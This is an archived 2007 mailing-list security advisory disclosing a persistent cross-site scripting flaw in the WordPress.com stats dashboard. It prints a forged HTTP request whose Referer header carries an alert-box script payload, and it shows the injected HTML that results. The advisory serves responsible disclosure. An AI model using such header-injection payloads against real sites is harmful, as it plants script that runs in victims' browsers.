lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 19 Jun 2007 18:23:59 +0200
From: Matteo Carli <matteo@...teocarli.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
	websecurity@...appsec.org
Subject: Persistent cross-site scripting in wordpress.com dashboard

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

1. DESCRIPTION OF THE SOFTWARE

On May 6th, 2007 a new WordPress plugin called "stats" was released.
This plugin allows a WordPress user who has his blog self-hosted to
use the Wordpress.com statistics.
The plugin includes a JavaScript on the blog page to collect
statistics from visitors. This statistics include page viewed, search
engine keywords, if used, and referrer as well.

2. DESCRIPTION OF THE VULNERABILITY

The referrer field is taken from the HTTP header generated by the user
with his browser. So it's a user-input and it is possibile therefore to
tamper with it.
This is a snip of code taken from the stats page of Wordpress.com dashboard.

...
<a href='http://www.referersite.it/?q=2'>http://www.referersite.it/?q=2</a>
...

If an attacker creates an HTTP request like this, an alert box will be
displayed when the blogger reads his stats:
GET http://www.somewpblog.com/ HTTP/1.1
Host:www.siteofblogger.com
User-Agent:Mozilla/5.0 (Windows; U; Windows NT 5.0; it; rv:1.8.1.3)
Gecko/20070309 Firefox/2.0.0.3
Accept:text/xml,application/xml,application/xhtml+xml,text/html;
q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language:it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding:gzip,deflate
Accept-Charset:ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive:300
Connection:keep-alive
Referer:http://www.e.it'></a><script>alert(/My XSS/)</script><a href='

On the stats page this HTML code will be written:

...
<a href='http://www.miosito.it'></a><script>alert(/My XSS/)</script><a
href=''>http://www.miosito.it'></a><script>alert(/My XSS/)</script><a
href='</a>
...

3. ANALYSIS

An attacker could forge the HTTP Referrer so to inject inside it some
Javascript code aiming to create a persistent cross-site scripting (XSS).

In order to exploit this vulnerability, an attacker can simply request a
page controlled by stats plugin and send a special HTTP header.
No interaction from the victim is needed.

4. TIME LINE

14/05/2007 - Vendor notified
XX/05/2007 - Vendor silently fixed the bug
13/06/2007 - Vendor recontacted
13/06/2007 - Vendor response
19/06/2007 - Public disclosure

- --
Matteo Carli
matteo at matteocarli dot com  |  web: www.matteocarli.com
GPG keyID: 0xD20BA70A	       |  GnuPG key server: pgp.mit.edu
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFGeAMfJbu92NILpwoRAnpBAKCcEymkf6sqGOznqZDdEP4x9lyjmACeMaVX
EJ5TPkb6+hpHQtuJw93jvkA=
=iZtl
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ